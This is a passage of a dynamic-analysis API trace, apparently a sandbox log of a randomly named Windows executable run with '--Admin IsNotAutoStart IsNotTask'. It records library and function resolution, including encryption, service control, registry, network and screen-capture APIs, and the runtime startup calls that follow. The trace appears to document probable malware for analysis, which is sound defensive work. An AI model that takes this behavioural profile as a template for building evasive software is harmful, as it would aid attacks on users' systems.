LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0149.413] GetProcAddress (hModule=0x77130000, lpProcName="PeekMessageW") returned 0x771505ba [0149.413] GetProcAddress (hModule=0x77130000, lpProcName="PostThreadMessageW") returned 0x77148bff [0149.413] GetProcAddress (hModule=0x77130000, lpProcName="DefWindowProcW") returned 0x77c725dd [0149.413] GetProcAddress (hModule=0x77130000, lpProcName="DispatchMessageW") returned 0x7714787b [0149.413] GetProcAddress (hModule=0x77130000, lpProcName="UpdateWindow") returned 0x77153559 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="CreateWindowExW") returned 0x77148a29 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="IsWindow") returned 0x77147136 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="ShowWindow") returned 0x77150dfb [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="RegisterClassExW") returned 0x7714b17d [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="PostQuitMessage") returned 0x77149abb [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="GetMessageW") returned 0x771478e2 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="DestroyWindow") returned 0x77149a55 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="GetProcessWindowStation") returned 0x77149eea [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="GetUserObjectInformationW") returned 0x77148068 [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxA") returned 0x7719fd1e [0149.414] GetProcAddress (hModule=0x77130000, lpProcName="GetDesktopWindow") returned 0x77150a19 [0149.415] GetProcAddress (hModule=0x77130000, lpProcName="MessageBoxW") returned 0x7719fd3f [0149.415] GetProcAddress (hModule=0x77130000, lpProcName="TranslateMessage") returned 0x77147809 [0149.415] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="GetUserNameW") returned 0x7772157a [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="ReportEventA") returned 0x77713ee9 [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="RegisterEventSourceA") returned 0x77722d46 [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="DeregisterEventSource") returned 0x777235dd [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="CryptHashData") returned 0x7771df36 [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0149.415] GetProcAddress (hModule=0x77710000, lpProcName="CryptDestroyHash") returned 0x7771df66 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="CryptCreateHash") returned 0x7771df4e [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="CryptEncrypt") returned 0x7773779b [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="CryptImportKey") returned 0x7771c532 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatus") returned 0x77722a86 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="OpenServiceW") returned 0x7771ca4c [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0149.416] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetHashParam") returned 0x7771df7e [0149.416] LoadLibraryA (lpLibFileName="SHELL32.dll") returned 0x759d0000 [0149.420] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetPathFromIDListW") returned 0x75a617bf [0149.420] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetSpecialFolderLocation") returned 0x75a5e141 [0149.420] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteA") returned 0x75c17078 [0149.421] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0149.421] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0149.421] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathA") returned 0x75ae7804 [0149.421] LoadLibraryA (lpLibFileName="ole32.dll") returned 0x76620000 [0149.421] GetProcAddress (hModule=0x76620000, lpProcName="CoInitialize") returned 0x7663b636 [0149.421] GetProcAddress (hModule=0x76620000, lpProcName="CoInitializeSecurity") returned 0x76647259 [0149.421] GetProcAddress (hModule=0x76620000, lpProcName="CoUninitialize") returned 0x766686d3 [0149.421] GetProcAddress (hModule=0x76620000, lpProcName="CoCreateInstance") returned 0x76669d0b [0149.421] LoadLibraryA (lpLibFileName="OLEAUT32.dll") returned 0x76e40000 [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0x6) returned 0x76e43e59 [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0x8) returned 0x76e43ed5 [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0x9) returned 0x76e43eae [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0xc8) returned 0x76e43f21 [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0xca) returned 0x76e4fd6b [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0xc) returned 0x76e45dee [0149.422] GetProcAddress (hModule=0x76e40000, lpProcName=0x2) returned 0x76e44642 [0149.422] LoadLibraryA (lpLibFileName="IPHLPAPI.DLL") returned 0x75660000 [0149.428] GetProcAddress (hModule=0x75660000, lpProcName="GetAdaptersInfo") returned 0x75669263 [0149.428] LoadLibraryA (lpLibFileName="WS2_32.dll") returned 0x77230000 [0149.430] GetProcAddress (hModule=0x77230000, lpProcName=0xc) returned 0x7723b131 [0149.430] GetProcAddress (hModule=0x77230000, lpProcName=0xb) returned 0x7723311b [0149.430] GetProcAddress (hModule=0x77230000, lpProcName=0x34) returned 0x77247673 [0149.430] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x75590000 [0149.435] GetProcAddress (hModule=0x75590000, lpProcName="DnsFree") returned 0x7559436b [0149.435] GetProcAddress (hModule=0x75590000, lpProcName="DnsQuery_W") returned 0x755a572c [0149.435] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x77550000 [0149.435] GetProcAddress (hModule=0x77550000, lpProcName="CryptStringToBinaryA") returned 0x77585d77 [0149.435] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0149.435] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteObject") returned 0x770b5689 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="GetObjectA") returned 0x770b85d4 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="SelectObject") returned 0x770b4f70 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="GetBitmapBits") returned 0x770bc155 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="BitBlt") returned 0x770b5ea6 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="DeleteDC") returned 0x770b58b3 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="CreateDCA") returned 0x770b7bcc [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleDC") returned 0x770b54f4 [0149.436] GetProcAddress (hModule=0x770a0000, lpProcName="CreateCompatibleBitmap") returned 0x770b5f49 [0149.436] LoadLibraryA (lpLibFileName="msvcr100.dll") returned 0x754d0000 [0149.442] GetProcAddress (hModule=0x754d0000, lpProcName="atexit") returned 0x754ec544 [0149.443] atexit (param_1=0x2100920) returned 0 [0149.449] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18f338 | out: lpSystemTimeAsFileTime=0x18f338*(dwLowDateTime=0x1209dc60, dwHighDateTime=0x1d69ad5)) [0149.449] GetCurrentThreadId () returned 0x1c4 [0149.449] GetCurrentProcessId () returned 0x6c8 [0149.449] QueryPerformanceCounter (in: lpPerformanceCount=0x18f330 | out: lpPerformanceCount=0x18f330*=26949057097) returned 1 [0149.646] GetStartupInfoW (in: lpStartupInfo=0x18f2c8 | out: lpStartupInfo=0x18f2c8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x76d43519, hStdOutput=0x77c5fd35, hStdError=0x77cc7daf)) [0149.657] GetProcessHeap () returned 0x2c0000 [0149.865] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0149.865] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0149.865] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0149.865] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0149.866] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0149.867] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0149.868] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0149.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3bc) returned 0x2df2b0 [0149.869] GetCurrentThreadId () returned 0x1c4 [0149.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2d21a0 [0149.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2df678 [0149.869] GetStartupInfoW (in: lpStartupInfo=0x18f298 | out: lpStartupInfo=0x18f298*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x425128, hStdOutput=0x5596ba4a, hStdError=0x58)) [0149.869] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0149.869] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0149.869] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0149.869] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe\" --Admin IsNotAutoStart IsNotTask" [0149.869] GetEnvironmentStringsW () returned 0x2dfe80* [0149.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xaca) returned 0x2e0958 [0149.869] FreeEnvironmentStringsW (penv=0x2dfe80) returned 1 [0149.869] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x511130, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\OnB5h0yX46mreVq4.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\onb5h0yx46mrevq4.exe")) returned 0x3a [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcc) returned 0x2dfe80 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x98) returned 0x2dff58 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3e) returned 0x2d4eb0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6c) returned 0x2dfff8 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x6e) returned 0x2e0070 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x78) returned 0x2d2d90 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x62) returned 0x2e00e8 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2dafd0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d6b50 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x28) returned 0x2da990 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1a) returned 0x2deee8 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x4a) returned 0x2e0158 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x72) returned 0x2d2e10 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db008 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db040 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1c) returned 0x2def10 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd2) returned 0x2e01b0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x7c) returned 0x2e0290 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e0318 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3a) returned 0x2d4ef8 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x90) returned 0x2e0358 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2da9c0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db078 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x36) returned 0x2e03f0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x48) returned 0x2d6ba0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e0430 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d4f40 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x82) returned 0x2e0490 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2e) returned 0x2db0b0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1e) returned 0x2def38 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2c) returned 0x2db0e8 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e0520 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x52) returned 0x2e0580 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2a) returned 0x2db120 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x3c) returned 0x2d4f88 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x54) returned 0x2e05e0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x24) returned 0x2da9f0 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x30) returned 0x2db158 [0149.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x8c) returned 0x2e0640 [0149.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e0958 | out: hHeap=0x2c0000) returned 1 [0149.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x800) returned 0x2e06d8 [0149.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x80) returned 0x2e0ee0 [0149.871] GetLastError () returned 0x0 [0149.871] SetLastError (dwErrCode=0x0) [0149.871] GetLastError () returned 0x0 [0149.871] SetLastError (dwErrCode=0x0) [0149.871] GetLastError () returned 0x0 [0149.871] SetLastError (dwErrCode=0x0) [0149.871] GetACP () returned 0x4e4 [0149.871] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x220) returned 0x2e0f68 [0149.871] GetLastError () returned 0x0 [0149.872] SetLastError (dwErrCode=0x0) [0149.872] IsValidCodePage (CodePage=0x4e4) returned 1 [0149.872] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f28c | out: lpCPInfo=0x18f28c) returned 1 [0149.872] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18ed54 | out: lpCPInfo=0x18ed54) returned 1 [0149.872] GetLastError () returned 0x0 [0149.872] SetLastError (dwErrCode=0x0) [0149.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0149.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18ead8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0149.872] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18ed68 | out: lpCharType=0x18ed68) returned 1 [0149.872] GetLastError () returned 0x0 [0149.872] SetLastError (dwErrCode=0x0) [0149.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0149.872] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f168, cbMultiByte=256, lpWideCharStr=0x18eaa8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0149.872] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0149.872] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e898, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0149.872] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18f068, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿÚº\x96U¤ò\x18", lpUsedDefaultChar=0x0) returned 256 [0149.872] GetLastError () returned 0x0 [0149.872] SetLastError (dwErrCode=0x0) [0149.872] MultiByteToWideChar (in: 